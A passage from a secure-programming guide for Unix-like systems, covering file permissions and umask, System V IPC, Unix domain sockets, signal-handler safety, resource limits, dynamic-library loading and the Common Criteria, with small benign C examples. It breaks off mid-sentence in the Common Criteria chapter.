Unix-like systems support MS-DOS disks, which by default support very few of
these attributes (and there's no standard way to define these attributes).
In that case, Unix-like systems emulate the standard attributes (possibly
implementing them through special on-disk files), and these attributes are
generally influenced by the mount(1) command.
It's important to note that, for adding and removing files, only the
permission bits and owner of the file's directory really matter unless the
Unix-like system supports more complex schemes (such as POSIX ACLs). Unless
the system has other extensions, and stock Linux 2.2 doesn't, a file that has
no permissions in its permission bits can still be removed if its containing
directory permits it. Also, if an ancestor directory permits its children to
be changed by some user or group, then any of that directory's descendants
can be replaced by that user or group.
The draft IEEE POSIX standard on security defines a technique for true ACLs
that support a list of users and groups with their permissions.
Unfortunately, this is not widely supported nor supported exactly the same
way across Unix-like systems. Stock Linux 2.2, for example, has neither ACLs
nor POSIX capability values in the filesystem.
It's worth noting that in Linux, the Linux ext2 filesystem by default
reserves a small amount of space for the root user. This is a partial defense
against denial-of-service attacks; even if a user fills a disk that is shared
with the root user, the root user has a little space left over (e.g., for
critical functions). The default is 5% of the filesystem space; see mke2fs
(8), in particular its ``-m'' option.
-----------------------------------------------------------------------------
3.2.2. Creation Time Initial Values
At creation time, the following rules apply. On most Unix systems, when a new
filesystem object is created via creat(2) or open(2), the FSO UID is set to
the process' EUID and the FSO's GID is set to the process' EGID. Linux works
slightly differently due to its FSUID extensions; the FSO's UID is set to the
process' FSUID, and the FSO GID is set to the process' FSGID; if the
containing directory's setgid bit is set or the filesystem's ``GRPID'' flag
is set, the FSO GID is actually set to the GID of the containing directory.
Many systems, including Sun Solaris and Linux, also support the setgid
directory extensions. As noted earlier, this special case supports
``project'' directories: to make a ``project'' directory, create a special
group for the project, create a directory for the project owned by that
group, then make the directory setgid: files placed there are automatically
owned by the project. Similarly, if a new subdirectory is created inside a
directory with the setgid bit set (and the filesystem GRPID isn't set), the
new subdirectory will also have its setgid bit set (so that project
subdirectories will ``do the right thing''); in all other cases the setgid
bit is clear for a new file. This is the rationale for the ``user-private
group''
scheme (used by Red Hat Linux and some others). In this scheme, every user is
a member of a ``private'' group with just themselves as members, so their
defaults can permit the group to read and write any file (since they're the
only member of the group). Thus, when the file's group membership is
transferred this way, read and write privileges are transferred too. FSO
basic access control values (read, write, execute) are computed from
(requested values & ~ umask of process). New files always start with a clear
sticky bit and clear setuid bit.
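The access-control computation just described (requested values & ~umask)
can be written out directly. A sketch, where the function name is mine
rather than a system call:

```c
#include <sys/types.h>
#include <sys/stat.h>

/* The mode actually given to a new filesystem object is the
   requested mode with the process umask bits masked out:
   effective = requested & ~umask.
   E.g. a request of 0666 under the common umask 022 yields 0644. */
mode_t effective_mode(mode_t requested, mode_t mask) {
    return requested & (mode_t)~mask;
}
```

In a real program the process umask is set with umask(2) and applied by the
kernel automatically; this helper only illustrates the arithmetic.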
-----------------------------------------------------------------------------
3.2.3. Changing Access Control Attributes
You can set most of these values with chmod(2), fchmod(2), or chmod(1) but
see also chown(1), and chgrp(1). In Linux, some of the Linux-unique
attributes are manipulated using chattr(1).
Note that in Linux, only root can change the owner of a given file. Some
Unix-like systems allow ordinary users to transfer ownership of their files
to another, but this causes complications and is forbidden by Linux. For
example, if you're trying to limit disk usage, allowing such operations would
allow users to claim that large files actually belonged to some other
``victim''.
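For example, a program can restrict a file it owns to owner-only access
using chmod(2). A small sketch (the helper name make_private is mine, not a
library function):

```c
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Clear all group/other permission bits on `path`, leaving only
   owner read/write (mode 0600).  Only the file's owner or root may
   do this; returns 0 on success, -1 (with errno set) on failure. */
int make_private(const char *path) {
    return chmod(path, S_IRUSR | S_IWUSR);
}
```

Note that unlike the mode argument of open(2), the mode given to chmod(2)
is applied exactly and is not filtered through the umask.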
-----------------------------------------------------------------------------
3.2.4. Using Access Control Attributes
Under Linux and most Unix-like systems, reading and writing attribute values
are only checked when the file is opened; they are not re-checked on every
read or write. Still, a large number of calls do check these attributes,
since the filesystem is so central to Unix-like systems. Calls that check
these attributes include open(2), creat(2), link(2), unlink(2), rename(2),
mknod(2), symlink(2), and socket(2).
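This check-at-open behavior is easy to demonstrate: a descriptor opened
before a chmod(2) keeps its access even after every permission bit is
removed from the file. A sketch (the helper name is mine):

```c
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` for reading, then strip ALL permission bits from it;
   the read through the already-open descriptor still succeeds,
   because the permission check happened at open(2) time.
   Returns 0 if one byte was read after the chmod, -1 otherwise. */
int read_after_chmod(const char *path) {
    int fd = open(path, O_RDONLY);
    char c;
    ssize_t n;
    if (fd < 0) return -1;
    if (chmod(path, 0) != 0) { close(fd); return -1; }
    n = read(fd, &c, 1);   /* not re-checked against the new mode */
    close(fd);
    return n == 1 ? 0 : -1;
}
```

This is why revoking access to a file does not affect processes that
already hold an open descriptor on it.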
-----------------------------------------------------------------------------
3.2.5. Filesystem Hierarchy
Over the years conventions have been built on ``what files to place where''.
Where possible, please follow conventional use when placing information in
the hierarchy. For example, place global configuration information in /etc.
The Filesystem Hierarchy Standard (FHS) tries to define these conventions in
a logical manner, and is widely used by Linux systems. The FHS is an update
to the previous Linux Filesystem Structure standard (FSSTND), incorporating
lessons learned and approaches from Linux, BSD, and System V systems. See
[http://www.pathname.com/fhs] http://www.pathname.com/fhs for more
information about the FHS. A summary of these conventions is in hier(5) for
Linux and hier(7) for Solaris. Sometimes different conventions disagree;
where possible, make these situations configurable at compile or installation
time.
I should note that the FHS has been adopted by the [http://www.linuxbase.org]
Linux Standard Base which is developing and promoting a set of standards to
increase compatibility among Linux distributions and to enable software
applications to run on any compliant Linux system.
-----------------------------------------------------------------------------
3.3. System V IPC
Many Unix-like systems, including Linux and System V systems, support System
V interprocess communication (IPC) objects. Indeed System V IPC is required
by the Open Group's Single UNIX Specification, Version 2 [Open Group 1997].
System V IPC objects can be one of three kinds: System V message queues,
semaphore sets, and shared memory segments. Each such object has the
following attributes:
  * read and write permissions for each of creator, creator group, and
    others.
  * creator UID and GID - UID and GID of the creator of the object.
  * owning UID and GID - UID and GID of the owner of the object (initially
    equal to the creator UID).
When accessing such objects, the rules are as follows:
  * if the process has root privileges, the access is granted.
  * if the process' EUID is the owner or creator UID of the object, then
    the appropriate creator permission bit is checked to see if access is
    granted.
  * if the process' EGID is the owner or creator GID of the object, or one
    of the process' groups is the owning or creating GID of the object,
    then the appropriate creator group permission bit is checked for
    access.
  * otherwise, the appropriate ``other'' permission bit is checked for
    access.
Note that root, or a process with the EUID of either the owner or creator,
can set the owning UID and owning GID and/or remove the object. More
information is available in ipc(5).
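As a sketch of creating such an object with restrictive permission bits
(the flags are as documented in shmget(2); the helper name is mine):

```c
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/types.h>
#include <unistd.h>

/* Create a private System V shared memory segment whose permission
   bits (0600) allow access only by the owner.  The kernel records
   the creator UID/GID at creation time.  Returns the segment id,
   or -1 on failure. */
int create_private_shm(size_t size) {
    return shmget(IPC_PRIVATE, size, IPC_CREAT | 0600);
}
```

The segment's recorded ownership can be inspected afterwards with
shmctl(2) and IPC_STAT, and the object removed with IPC_RMID.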
-----------------------------------------------------------------------------
3.4. Sockets and Network Connections
Sockets are used for communication, particularly over a network. Sockets were
originally developed by the BSD branch of Unix systems, but they are
generally portable to other Unix-like systems: Linux and System V variants
support sockets as well, and socket support is required by the Open Group's
Single Unix Specification [Open Group 1997]. System V systems traditionally
used a different (incompatible) network communication interface, but it's
worth noting that systems like Solaris include support for sockets. Socket(2)
creates an endpoint for communication and returns a descriptor, in a manner
similar to open(2) for files. The parameters for socket specify the protocol
family and type, such as the Internet domain (TCP/IP version 4), Novell's
IPX, or the ``Unix domain''. A server then typically calls bind(2), listen
(2), and accept(2) or select(2). A client typically calls bind(2) (though
that may be omitted) and connect(2). See these routines' respective man pages
for more information. It can be difficult to understand how to use sockets
from their man pages; you might want to consult other papers such as Hall
"Beej" [1999] to learn how these calls are used together.
The ``Unix domain sockets'' don't actually represent a network protocol;
they can only connect to sockets on the same machine (at the time of this
writing, for the standard Linux kernel). When used as a stream, they are
fairly similar to named pipes, but with significant advantages. In
particular, a Unix domain socket is connection-oriented; each new connection
to the socket
results in a new communication channel, a very different situation than with
named pipes. Because of this property, Unix domain sockets are often used
instead of named pipes to implement IPC for many important services. Just
like you can have unnamed pipes, you can have unnamed Unix domain sockets
using socketpair(2); unnamed Unix domain sockets are useful for IPC in a way
similar to unnamed pipes.
There are several interesting security implications of Unix domain sockets.
First, although Unix domain sockets can appear in the filesystem and can have
stat(2) applied to them, you can't use open(2) to open them (you have to use
the socket(2) and friends interface). Second, Unix domain sockets can be used
to pass file descriptors between processes (not just the file's contents).
This odd capability, not available in any other IPC mechanism, has been used
to hack all sorts of schemes (the descriptors can basically be used as a
limited version of the ``capability'' in the computer science sense of the
term). File descriptors are sent using sendmsg(2), where the msg (message)'s
field msg_control points to an array of control message headers (field
msg_controllen must specify the number of bytes contained in the array). Each
control message is a struct cmsghdr followed by data, and for this purpose
you want the cmsg_type set to SCM_RIGHTS. A file descriptor is retrieved
through recvmsg(2) and then tracked down in the analogous way. Frankly, this
feature is quite baroque, but it's worth knowing about.
Linux 2.2 and later supports an additional feature in Unix domain sockets:
you can acquire the peer's ``credentials'' (the pid, uid, and gid). Here's
some sample code:
/* fd = file descriptor of the Unix domain socket connected
   to the client you wish to identify */
struct ucred cr;
socklen_t cl = sizeof(cr);
if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &cl) == 0) {
    printf("Peer's pid=%d, uid=%d, gid=%d\n",
           cr.pid, cr.uid, cr.gid);
}
Standard Unix convention is that binding to TCP and UDP local port numbers
less than 1024 requires root privilege, while any process can bind to an
unbound port number of 1024 or greater. Linux follows this convention; more
specifically, Linux requires a process to have the capability
CAP_NET_BIND_SERVICE to bind to a port number less than 1024, and this
capability is normally only held by processes with an EUID of 0. The
adventurous can check this by examining the Linux source; in Linux 2.2.12,
it's in file /usr/src/linux/net/ipv4/af_inet.c, function inet_bind().
-----------------------------------------------------------------------------
3.5. Signals
Signals are a simple form of ``interruption'' in the Unix-like OS world, and
are an ancient part of Unix. A process can send a ``signal'' to another
process (say, using kill(1) or kill(2)), and that other process will receive
and handle the signal asynchronously. For a process to have permission to
send an arbitrary signal to some other process, the sending process must
either have root privileges, or the real or effective user ID of the sending
process must equal the real or saved set-user-ID of the receiving process.
However, some signals can be sent in other ways. In particular, SIGURG can be
delivered over a network through the TCP/IP out-of-band (OOB) message.
Although signals are an ancient part of Unix, they've had different semantics
in different implementations. Basically, they involve questions such as
``what happens when a signal occurs while handling another signal''? The
older Linux libc 5 used a different set of semantics for some signal
operations than the newer GNU libc libraries. Calling C library functions is
often unsafe within a signal handler, and even some system calls aren't safe;
you need to examine the documentation for each call you make to see if it
promises to be safe to call inside a signal. For more information, see the
glibc FAQ (on some systems a local copy is available at /usr/doc/glibc-*/
FAQ).
For new programs, just use the POSIX signal system (which in turn was based
on BSD work); this set is widely supported and doesn't have some of the
problems that some of the older signal systems did. The POSIX signal system
is based on using the sigset_t datatype, which can be manipulated through a
set of operations: sigemptyset(), sigfillset(), sigaddset(), sigdelset(), and
sigismember(). You can read about these in sigsetops(3). Then use sigaction
(2), sigprocmask(2), sigpending(2), and sigsuspend(2) to set up and manipulate
signal handling (see their man pages for more information).
In general, make any signal handlers very short and simple, and look
carefully for race conditions. Signals, since they are by nature
asynchronous, can easily cause race conditions.
A common convention exists for servers: if you receive SIGHUP, you should
close any log files, reopen and reread configuration files, and then re-open
the log files. This supports reconfiguration without halting the server and
log rotation without data loss. If you are writing a server where this
convention makes sense, please support it.
Michal Zalewski [2001] has written an excellent tutorial on how signal
handlers are exploited, and has recommendations for how to eliminate signal
race problems. I encourage looking at his summary for more information; here
are my recommendations, which are similar to Michal's work:
  * Where possible, have your signal handlers unconditionally set a specific
    flag and do nothing else.
  * If you must have more complex signal handlers, use only calls
    specifically designated as being safe for use in signal handlers. In
    particular, don't use malloc() or free() in C (which on most systems
    aren't protected against signals), nor the many functions that depend on
    them (such as the printf() family and syslog()). You could try to
    ``wrap'' calls to insecure library calls with a check to a global flag
    (to avoid re-entry), but I wouldn't recommend it.
  * Block signal delivery during all non-atomic operations in the program,
    and block signal delivery inside signal handlers.
-----------------------------------------------------------------------------
3.6. Quotas and Limits
Many Unix-like systems have mechanisms to support filesystem quotas and
process resource limits. This certainly includes Linux. These mechanisms are
particularly useful for preventing denial of service attacks; by limiting the
resources available to each user, you can make it hard for a single user to
use up all the system resources. Be careful with terminology here, because
both filesystem quotas and process resource limits have ``hard'' and ``soft''
limits but the terms mean slightly different things.
You can define storage (filesystem) quota limits on each mountpoint for the
number of blocks of storage and/or the number of unique files (inodes) that
can be used, and you can set such limits for a given user or a given group. A
``hard'' quota limit is a never-to-exceed limit, while a ``soft'' quota can
be temporarily exceeded. See quota(1), quotactl(2), and quotaon(8).
The rlimit mechanism supports a large number of process quotas, such as file
size, number of child processes, number of open files, and so on. There is a
``soft'' limit (also called the current limit) and a ``hard limit'' (also
called the upper limit). The soft limit cannot be exceeded at any time, but
through calls it can be raised up to the value of the hard limit. See
getrlimit(2), setrlimit(2), and getrusage(2), sysconf(3), and ulimit(1). Note
that there are several ways to set these limits, including the PAM module
pam_limits.
-----------------------------------------------------------------------------
3.7. Dynamically Linked Libraries
Practically all programs depend on libraries to execute. In most modern
Unix-like systems, including Linux, programs are by default compiled to use
dynamically linked libraries (DLLs). That way, you can update a library and
all the programs using that library will use the new (hopefully improved)
version if they can.
Dynamically linked libraries are typically placed in one of a few special
directories. The usual directories include /lib, /usr/lib, /lib/security for
PAM modules, /usr/X11R6/lib for the X Window System, and /usr/local/lib. You
should use these standard conventions in your programs; in particular, except
during debugging you shouldn't use a value computed from the current
directory as a source for dynamically linked libraries (an attacker may be
able to add their own choice of ``library'' values).
There are special conventions for naming libraries and having symbolic links
for them, with the result that you can update libraries and still support
programs that want to use old, non-backward-compatible versions of those
libraries. There are also ways to override specific libraries or even just
specific functions in a library when executing a particular program. This is
a real advantage of Unix-like systems over Windows-like systems; I believe
Unix-like systems have a much better system for handling library updates, one
reason that Unix and Linux systems are reputed to be more stable than
Windows-based systems.
On GNU glibc-based systems, including all Linux systems, the list of
directories automatically searched during program start-up is stored in the
file /etc/ld.so.conf. Many Red Hat-derived distributions don't normally
include /usr/local/lib in the file /etc/ld.so.conf. I consider this a bug,
and adding /usr/local/lib to /etc/ld.so.conf is a common ``fix'' required to
run many programs on Red Hat-derived systems. If you want to just override a
few functions in a library, but keep the rest of the library, you can enter
the names of overriding libraries (.o files) in /etc/ld.so.preload; these
``preloading'' libraries will take precedence over the standard set. This
preloading file is typically used for emergency patches; a distribution
usually won't include such a file when delivered. Searching all of these
directories at program start-up would be too time-consuming, so a caching
arrangement is actually used. The program ldconfig(8) by default reads in the
file /etc/ld.so.conf, sets up the appropriate symbolic links in the dynamic
link directories (so they'll follow the standard conventions), and then
writes a cache to /etc/ld.so.cache that's then used by other programs. So,
ldconfig has to be run whenever a DLL is added, when a DLL is removed, or
when the set of DLL directories changes; running ldconfig is often one of the
steps performed by package managers when installing a library. On start-up,
then, a program uses the dynamic loader to read the file /etc/ld.so.cache and
then load the libraries it needs.
Various environment variables can control this process, and in fact there are
environment variables that permit you to override this process (so, for
example, you can temporarily substitute a different library for this
particular execution). In Linux, the environment variable LD_LIBRARY_PATH is
a colon-separated set of directories where libraries are searched for first,
before the standard set of directories; this is useful when debugging a new
library or using a nonstandard library for special purposes, but be sure you
trust those who can control those directories. The variable LD_PRELOAD lists
object files with functions that override the standard set, just as /etc/
ld.so.preload does. The variable LD_DEBUG displays debugging information; if
set to ``all'', voluminous information about the dynamic linking process is
displayed while it's occurring.
Permitting user control over dynamically linked libraries would be disastrous
for setuid/setgid programs if special measures weren't taken. Therefore, in
the GNU glibc implementation, if the program is setuid or setgid these
variables (and other similar variables) are ignored or greatly limited in
what they can do. The GNU glibc library determines if a program is setuid or
setgid by checking the program's credentials; if the UID and EUID differ, or
the GID and the EGID differ, the library presumes the program is setuid/
setgid (or descended from one) and therefore greatly limits its abilities to
control linking. You can see this in the GNU glibc source code; see
especially the files elf/rtld.c and sysdeps/generic/dl-sysdep.c. This means
that if you cause the UID and GID to equal the EUID and EGID, and then call a
program, these variables will have full effect. Other Unix-like systems
handle the situation differently but for the same reason: a setuid/setgid
program should not be unduly affected by the environment variables set. Note
that graphical user interface toolkits generally do permit user control over
dynamically linked libraries, because executables that directly invoke
graphical user interface toolkits should never, ever, be setuid (or have other
special privileges) at all. For more about how to develop secure GUI
applications, see Section 7.4.4.
For Linux systems, you can get more information from my document, the Program
Library HOWTO.
-----------------------------------------------------------------------------
3.8. Audit
Different Unix-like systems handle auditing differently. In Linux, the most
common ``audit'' mechanism is syslogd(8), usually working in conjunction with
klogd(8). You might also want to look at wtmp(5), utmp(5), lastlog(8), and
acct(2). Some server programs (such as the Apache web server) also have their
own audit trail mechanisms. According to the FHS, audit logs should be stored
in /var/log or its subdirectories.
-----------------------------------------------------------------------------
3.9. PAM
Sun Solaris and nearly all Linux systems use the Pluggable Authentication
Modules (PAM) system for authentication. PAM permits run-time configuration
of authentication methods (e.g., use of passwords, smart cards, etc.). See
Section 11.6 for more information on using PAM.
-----------------------------------------------------------------------------
3.10. Specialized Security Extensions for Unix-like Systems
A vast amount of research and development has gone into extending Unix-like
systems to support security needs of various communities. For example,
several Unix-like systems have been extended to support the U.S. military's
desire for multilevel security. If you're developing software, you should try
to design your software so that it can work within these extensions.
FreeBSD has a new system call, [http://docs.freebsd.org/44doc/papers/jail/
jail.html] jail(2). The jail system call supports sub-partitioning an
environment into many virtual machines (in a sense, a ``super-chroot''); its
most popular use has been to provide virtual machine services for Internet
Service Provider environments. Inside a jail, all processes (even those owned
by root) have the scope of their requests limited to the jail. When a
FreeBSD system is booted up after a fresh install, no processes will be in
jail. When a process is placed in a jail, it, and any descendants of that
process, will be in that jail. Once in a jail, access to the file
name-space is restricted in the style of chroot(2) (with typical chroot
escape routes blocked), the ability to bind network resources is limited to a
specific IP address, the ability to manipulate system resources and perform
privileged operations is sharply curtailed, and the ability to interact with
other processes is limited to only processes inside the same jail. Note that
each jail is bound to a single IP address; processes within the jail may not
make use of any other IP address for outgoing or incoming connections.
Some extensions available in Linux, such as POSIX capabilities and special
mount-time options, have already been discussed. Here are a few of these
efforts for Linux systems for creating restricted execution environments;
there are many different approaches. The U.S. National Security Agency (NSA)
has developed [http://www.nsa.gov/selinux] Security-Enhanced Linux (Flask),
which supports defining a security policy in a specialized language and then
enforces that policy. The [http://medusa.fornax.sk] Medusa DS9 extends Linux
by supporting, at the kernel level, a user-space authorization server. [http:
//www.lids.org] LIDS protects files and processes, allowing administrators to
``lock down'' their system. The ``Rule Set Based Access Control'' system,
[http://www.rsbac.de] RSBAC is based on the Generalized Framework for Access
Control (GFAC) by Abrams and LaPadula and provides a flexible system of
access control based on several kernel modules. [http://subterfugue.org]
Subterfugue is a framework for ``observing and playing with the reality of
software''; it can intercept system calls and change their parameters and/or
change their return values to implement sandboxes, tracers, and so on; it
runs under Linux 2.4 with no changes (it doesn't require any kernel
modifications). [http://www.cs.berkeley.edu/~daw/janus] Janus is a security
tool for sandboxing untrusted applications within a restricted execution
environment. Some have even used [http://user-mode-linux.sourceforge.net]
User-mode Linux, which implements ``Linux on Linux'', as a sandbox
implementation. Because there are so many different approaches to
implementing more sophisticated security models, Linus Torvalds has requested
that a generic approach be developed so different security policies can be
inserted; for more information about this, see [http://mail.wirex.com/mailman
/listinfo/linux-security-module] http://mail.wirex.com/mailman/listinfo/
linux-security-module.
There are many other extensions for security on various Unix-like systems,
but these are really outside the scope of this document.
-----------------------------------------------------------------------------
Chapter 4. Security Requirements
      You will know that your tent is
      secure; you will take stock of your
      property and find nothing missing.
                         Job 5:24 (NIV)
Before you can determine if a program is secure, you need to determine
exactly what its security requirements are. Thankfully, there's an
international standard for identifying and defining security requirements
that is useful for many such circumstances: the Common Criteria [CC 1999],
standardized as ISO/IEC 15408:1999. The CC is the culmination of decades of
work to identify information technology security requirements. There are
other schemes for defining security requirements and evaluating products to
see if products meet the requirements, such as NIST FIPS-140 for
cryptographic equipment, but these other schemes are generally focused on a
specialized area and won't be considered further here.
This chapter briefly describes the Common Criteria (CC) and how to use its
concepts to help you informally identify security requirements and talk with
others about security requirements using standard terminology. The language
of the CC is more precise, but it's also more formal and harder to
understand; hopefully the text in this section will help you "get the gist".
Note that, in some circumstances, software cannot be used unless it has
undergone a CC evaluation by an accredited laboratory. This includes certain
kinds of uses in the U.S. Department of Defense (as specified by NSTISSP
Number 11, which requires that before some products can be used they must be
evaluated or enter evaluation), and in the future such a requirement may also
include some kinds of uses for software in the U.S. federal government. This
section doesn't provide enough information if you plan to actually go through
a CC evaluation by an accredited laboratory. If you plan to go through a
formal evaluation, you need to read the real CC, examine various websites to
really understand the basics of the CC, and eventually contract a lab
accredited to do a CC evaluation.
-----------------------------------------------------------------------------
4.1. Common Criteria Introduction
First, some general information about the CC will help understand how to
apply its concepts. The CC's official name is "The Common Criteria for
Information Technology Security Evaluation", though it's normally just called
the Common Criteria. The CC document has three parts: the introduction (that
describes the CC overall), security functional requirements (that lists
various kinds of security functions that products might want to include), and
security assurance requirements (that lists various methods of assuring that
a product is secure). There is also a related document, the "Common
Evaluation Methodology" (CEM), that guides evaluators how to apply the CC
when doing formal evaluations (in particular, it amplifies what the CC means
in certain cases).
Although the CC is International Standard ISO/IEC 15408:1999, it is
outrageously expensive to order the CC from ISO. Hopefully someday ISO will
follow the lead of other standards organizations such as the IETF and the
W3C, which freely redistribute standards. Not surprisingly, IETF and W3C
standards are followed more often than many ISO standards, in part because
ISO's fees for standards simply make them inaccessible to most developers. (I
don't mind authors being paid for their work, but ISO doesn't fund most of
the standards development work - indeed, many of the developers of ISO
documents are volunteers - so ISO's indefensible fees only line their own
pockets and don't actually aid the authors or users at all.) Thankfully, the
CC developers anticipated this problem and have made sure that the CC's
technical content is freely available to all; you can download the CC's
technical content from [http://csrc.nist.gov/cc/ccv20/ccv2list.htm] http://
csrc.nist.gov/cc/ccv20/ccv2list.htm. Even those doing formal evaluation
processes usually use these editions of the CC, and not the ISO versions;
there's simply no good reason to pay ISO for them.
Although it can be used in other ways, the CC is typically used to create two
kinds of documents, a ``Protection Profile'' (PP) or a ``Security Target''
(ST). A ``protection profile'' (PP) is a document created by a group of users
(for example, a consumer group or large organization) that identifies the
desired security properties of a product. Basically, a PP is a list of user
security requirements, described in a very specific way defined by the CC. If
you're building a product similar to other existing products, it's quite
possible that there are one or more PPs that define what some users believe
are necessary for that kind of product (e.g., an operating system or
firewall). A ``security target'' (ST) is a document that identifies what a
product actually does, or a subset of it, that is security-relevant. An ST
doesn't need to meet the requirements of any particular PP, but an ST could
meet the requirements of one or more PPs.
Both PPs and STs can go through a formal evaluation. An evaluation of a PP
simply ensures that the PP meets various documentation rules and sanity
checks. An ST evaluation involves not just examining the ST document, but
more importantly it involves evaluating an actual system (called the ``target
of evaluation'', or TOE). The purpose of an ST evaluation is to ensure that,
to the level of the assurance requirements specified by the ST, the actual
product (the TOE) meets the ST's security functional requirements. Customers
can then compare evaluated STs to PPs describing what they want. Through this
comparison, consumers can determine if the products meet their requirements -
and if not, where the limitations are.
To create a PP or ST, you go through a process of identifying the security
environment, namely, your assumptions, threats, and relevant organizational
security policies (if any). From the security environment, you derive the
security objectives for the product or product type. Finally, the security
requirements are selected so that they meet the objectives. There are two
kinds of security requirements: functional requirements (what a product has
to be able to do), and assurance requirements (measures to inspire confidence
that the objectives have been met). Actually creating a PP or ST is often not
a simple straight line as outlined here, but the final result needs to show a
clear relationship so that no critical point is easily overlooked. Even if
you don't plan to write an ST or PP, the ideas in the CC can still be
helpful; the process of identifying the security environment, objectives, and
requirements is still helpful in identifying what's really important.
The vast majority of the CC's text is used to define standardized functional
requirements and assurance requirements. In essence, the majority of the CC
is a ``Chinese menu'' of possible security requirements that someone might
want. PP authors pick from the various options to describe what they want,
and ST authors pick from the options to describe what they provide.
Since many people might have difficulty identifying a reasonable set of
assurance requirements, pre-created sets of assurance requirements called
``evaluation assurance levels'' (EALs) have been defined, ranging from 1 to
7. EAL 2 is simply a standard shorthand for the set of assurance requirements
defined for EAL 2. Products can add additional assurance measures, for
example, they might choose EAL 2 plus some additional assurance measures (if
the combination isn't enough to achieve a higher EAL level, such a
combination would be called "EAL 2 plus"). There are mutual recognition
agreements signed between many of the world's nations that will accept an
evaluation done by an accredited laboratory in the other countries as long as
all of the assurance measures taken were at the EAL 4 level or less.
If you want to actually write an ST or PP, there's an open source software
program that can help you, called the ``CC Toolbox''. It can make sure that
dependencies between requirements are met, suggest common requirements, and
help you quickly develop a document, but it obviously can't do your thinking
for you. The specification of exactly what information must be in a PP or ST
is in CC part 1, annexes B and C respectively.
If you do decide to have your product (or PP) evaluated by an accredited
laboratory, be prepared to spend money, spend time, and work throughout the
process. In particular, evaluations require paying an accredited lab to do
the evaluation, and higher levels of assurance become rapidly more expensive.
Simply believing your product is secure isn't good enough; evaluators will
require evidence to justify any claims made. Thus, evaluations require
documentation, and usually the available documentation has to be improved or
developed to meet CC requirements (especially at the higher assurance
levels). Every claim has to be justified to some level of confidence, so the
more claims made, the stronger the claims, and the more complicated the
design, the more expensive an evaluation is. Obviously, when flaws are found,
they will usually need to be fixed. Note that a laboratory is paid to
evaluate a product and determine the truth. If the product doesn't meet its
claims, then you basically have two choices: fix the product, or change
(reduce) the claims.
It's important to discuss with customers what's desired before beginning a
formal ST evaluation; an ST that includes functional or assurance
requirements not truly needed by customers will be unnecessarily expensive to
evaluate, and an ST that omits necessary requirements may not be acceptable
to the customers (because that necessary piece won't have been evaluated).
PPs identify such requirements, but make sure that the PP accurately reflects
the customer's real requirements (perhaps the customer only wants a part of
the functionality or assurance in the PP, or has a different environment in
mind, or wants something else instead for the situations where your product
will be used). Note that an ST need not include every security feature in a
product; an ST only states what will be (or has been) evaluated. A product
that has a higher EAL rating is not necessarily more secure than a similar
product with a lower rating or no rating; the environment might be different,
the evaluation may have saved money and time by not evaluating the other
product at a higher level, or perhaps the evaluation missed something
important. Evaluations are not proofs; they simply impose a defined minimum
bar to gain confidence in the requirements or product.
-----------------------------------------------------------------------------
4.2. Security Environment and Objectives
The first step in defining a PP or ST is to identify the ``security
environment''. This means that you have to consider the physical environment
(can attackers access the computer hardware?), the assets requiring
protection (files, databases, authorization credentials, and so on), and the
purpose of the TOE (what kind of product is it? what is the intended use?).
In developing a PP or ST, you'd end up with a statement of assumptions (who
is trusted? is the network or platform benign?), threats (that the system or
its environment must counter), and organizational security policies (that the
system or its environment must meet). A threat is characterized in terms of a
threat agent (who might perform the attack?), a presumed attack method, any
vulnerabilities that are the basis for the attack, and what asset is under
attack.
You'd then define a set of security objectives for the system and
environment, and show that those objectives counter the threats and satisfy
the policies. Even if you aren't creating a PP or ST, thinking about your
assumptions, threats, and possible policies can help you avoid foolish
decisions. For example, if the computer network you're using can be sniffed
(e.g., the Internet), then unencrypted passwords are a foolish idea in most
circumstances.
For the CC, you'd then identify the functional and assurance requirements
that would be met by the TOE, and which ones would be met by the environment,
to meet those security objectives. These requirements would be selected from
the ``Chinese menu'' of the CC's possible requirements, and the next sections
will briefly describe the major classes of requirements. In the CC,
requirements are grouped into classes, which are subdivided into families,
which are further subdivided into components; the details of all this are in
the CC itself if you need to know about this. A good diagram showing how this
works is in the CC part 1, figure 4.5, which I cannot reproduce here.
Again, if you're not intending for your product to undergo a CC evaluation,
it's still good to briefly determine this kind of information and informally
include that information in your documentation (e.g., the man page or
whatever your documentation is).
-----------------------------------------------------------------------------
4.3. Security Functionality Requirements
This section briefly describes the CC security functionality requirements (by
CC class), primarily to give you an idea of the kinds of security
requirements you might want in your software. If you want more detail about
the CC's requirements, see CC part 2. Here are the major classes of CC
security requirements, along with the 3-letter CC abbreviation for that
class:
  * Security Audit (FAU). Perhaps you'll need to recognize, record, store,
and analyze security-relevant activities. You'll need to identify what
you want to make auditable, since often you can't leave all possible
auditing capabilities enabled. Also, consider what to do when there's no
room left for auditing - if you stop the system, an attacker may
intentionally do things to be logged and thus stop the system.
  * Communication/Non-repudiation (FCO). This class is poorly named in the
CC; officially it's called communication, but the real meaning is
non-repudiation. Is it important that an originator cannot deny having
sent a message, or that a recipient cannot deny having received it? There
are limits to how well technology itself can support non-repudiation
(e.g., a user might be able to give their private key away ahead of time
if they wanted to be able to repudiate something later), but nevertheless
for some applications supporting non-repudiation capabilities is very
useful.
  * Cryptographic Support (FCS). If you're using cryptography, what
operations use cryptography, what algorithms and key sizes are you using,
and how are you managing their keys (including distribution and
destruction)?
  * User Data Protection (FDP). This class specifies requirements for
protecting user data, and is a big class in the CC with many families
inside it. The basic idea is that you should specify a policy for data
(access control or information flow rules), develop various means to
implement the policy, possibly support off-line storage, import, and
export, and provide integrity when transferring user data between TOEs.
One often-forgotten issue is residual information protection - is it
acceptable if an attacker can later recover ``deleted'' data?
  * Identification and authentication (FIA). Generally you don't just want a
user to report who they are (identification) - you need to verify their
identity, a process called authentication. Passwords are the most common
mechanism for authentication. It's often useful to limit the number of
authentication attempts (if you can) and limit the feedback during
authentication (e.g., displaying asterisks instead of the actual
password). Certainly, limit what a user can do before authenticating; in
many cases, don't let the user do anything without authenticating. There
may be many issues controlling when a session can start, but in the CC
world this is handled by the "TOE access" (FTA) class described below
instead.
  * Security Management (FMT). Many systems will require some sort of
management (e.g., to control who can do what), generally by those who are
given a more trusted role (e.g., administrator). Be sure you think
through what those special operations are, and ensure that only those
with the trusted roles can invoke them. You want to limit trust; ideally,
even more trusted roles should be limited in what they can do.
  * Privacy (FPR). Do you need to support anonymity, pseudonymity,
unlinkability, or unobservability? If so, are there conditions where you
